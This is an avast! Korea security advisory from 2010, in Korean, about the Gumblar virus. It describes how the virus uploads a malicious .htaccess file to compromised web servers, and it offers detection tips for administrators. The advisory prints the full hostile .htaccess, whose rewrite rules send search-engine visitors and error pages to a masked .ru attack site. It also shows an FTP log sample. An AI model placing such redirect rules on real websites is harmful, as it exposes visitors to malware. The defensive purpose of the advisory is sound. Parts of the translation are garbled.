DLP, 스팸메일차단, 웹방화벽, 어베스트 백신
Gumblar (간부라) 바이러스에 의한 새로운 홈페이지 변조 피해 확인 :: 전세계 PC 10대중 2대는 어베스트 백신을 선택하였습니다 - 세계 1억 8천만, 국내 3백만 사용자

태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.
 avast! 안티바이러스


Gumblar (간부라) 바이러스에 의한 새로운 홈페이지 변조 피해 확인

새로운 소식 2010/03/08 09:44

※ 본주의는 2009 년 12 월 25 일 【Gumblar (간부라) 바이러스의 조직 감염 확대와 홈페이지 변조 피해 증가에 따른 대책의 확인에 대한 주의 전달입니다.

Apache 설정 파일인 htaccess 파일을 주의하여야 합니다. "htaccess"불법 업로드를 수행하는 Gumblar 바이러스의 활동을 여러 사이트에서 확인했습니다. 현재 알려진 것은 다음과 같은 내용입니다.

[공격 확인 일】

  • LAC이 공격을 처음으로 인식하고있는 것은 2010 년 3 월 1 일입니다
  • FTP 전송 로그에서 적어도 2010 년 1 월 말에는이 공격이 발생했던 것으로 추측하고있습니다

【동작 개요]

이. htaccess 파일을 두는 영향은 주요 검색 사이트의 액세스 및 404,403 등 오류가 Apache 리디렉션 공격 사이트로 전달되는 것입니다. 공격 사이트로 전송되면, 다른 Gumblar 공격과 마찬가지로 악성 프로그램 감염 피해를 遭わ 수 추측됩니다.

[기존 Gumblar의 차이점]

전통적인 Gumblar 공격과 차이점은 다음 2 가지가 발견됩니다.

1. 사용자는 JavaScript의 대책만으로는 막을 수 없다
Firefox + NoScript 조합은 막을 수 없을 가능성이 있고 RequestPolicy 같은 리디렉션 대책이 가능한 추가 기능을 이용할 필요가있습니다.
2. 콘텐츠 파일 감시만으로는 알 수 없다
콘텐츠 파일 자체는 손상되지 않으며, 또한 북마크 (즐겨찾기) 및 URL 직접 입력하여 사이트를 볼 경우에는 영향을받지 않으므로, Web 사이트 관리자가 피해를 알아채지.

[Web 서버 관리자 조치】

부정하게한다. htaccess 파일이 존재하지 않는지 확인하십시오. FTP 전송 로그. htaccess 파일이 업로드되지 않았는지 확인하는 것도 유효합니다.

확인된 로그 샘플

FTP
Jan dd hh : mm : ss 2010 1 xxxx 1278 / home / xxxx / .htaccess b _ ir xxxx ftp 0 * c

※ 현재 최상위 디렉토리에 단발로 업로드되어 있는지 확인합니다.

업로드된다. "htaccess"파일

# HostRule
RewriteEngine On
RewriteCond % (HTTP_REFERER) .* google .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* ask .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* yahoo .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* excite .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* altavista .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* msn .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* netscape .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* aol .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* hotbot .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* goto .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* infoseek .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* mamma .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* alltheweb .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* lycos .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* search .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* metacrawler .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* yandex .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* rambler .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* mail .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* dogpile .* $ [NC, OR]
RewriteCond % (HTTP_REFERER) .* ya .* $ [NC]
RewriteRule ^(.*)$ http:// ********. ru / [R = 301, L]

ErrorDocument 401 http:// ********. ru /
ErrorDocument 403 http:// ********. ru /
ErrorDocument 404 http:// ********. ru /
ErrorDocument 500 http:// ********. ru /
# / HostRule




TAG ,
트랙백이 없고, 댓글 2개가 달렸습니다
질의응답 | 뉴스수신해지 | 사용약관 | 개인정보보호 | 회사소개 | 연락처 | 파트너 | 트위터 | 페이스북 | rss
avast! is a registered trademark of AVAST Software a.s. and is used in www.avastkorea.com under non-exclusive license from AVAST Software a.s.
Copyright 2002-2012 (주)소프트메일 All Rights Reserved. Tel:02-3486-9220 Fax:02-3486-9331
사업자:214-87-14889, 통신판매 구로제0716호, 대표:오봉근, 개인정보관리:김선일, (주)케이에스넷 구매안전서비스(에스크로) 가입
어베스트 개인정보는 당사의 HALON SX방화벽, 트릿센트리 웹방화벽, 어베스트 서버용 백신, SPG스팸메일 차단시스템으로 보호되고 있습니다.